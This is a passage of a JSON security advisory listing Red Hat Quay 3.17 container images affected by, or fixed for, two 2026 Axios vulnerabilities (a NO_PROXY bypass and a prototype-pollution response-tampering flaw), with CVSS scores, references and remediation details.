          "text": "2461626"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client. An attacker who can control the destination address of an Axios request can exploit this vulnerability. By using specific internal network addresses (within the 127.0.0.0/8 range, excluding 127.0.0.1), the attacker can completely bypass the NO_PROXY protection, potentially leading to unauthorized access or information disclosure within the network. This issue is an incomplete fix for a previous vulnerability.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: NO_PROXY bypass via crafted URL",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42043"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461626",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461626"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42043",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42043"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42043",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42043"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-pmwg-cvhr-8vh7",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-pmwg-cvhr-8vh7"
        }
      ],
      "release_date": "2026-04-24T17:54:42.668000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T13:10:36+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22465"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: NO_PROXY bypass via crafted URL"
    },
    {
      "cve": "CVE-2026-42044",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-04-24T19:01:13.418725+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461624"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a widely used HTTP client. This vulnerability, known as a Prototype Pollution \"Gadget\" attack, allows a remote attacker to subtly alter JSON API responses. By manipulating a specific function, an attacker can selectively modify data within these responses. This could lead to significant security breaches, including unauthorized privilege escalation, fraudulent balance manipulation, or bypassing critical authorization checks.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Invisible JSON Response Tampering via Prototype Pollution Gadget",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42044"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461624",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461624"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42044",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42044"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42044",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42044"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-3w6x-2g7m-8v23",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-3w6x-2g7m-8v23"
        }
      ],
      "release_date": "2026-04-24T17:49:49.517000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T13:10:36+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22465"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
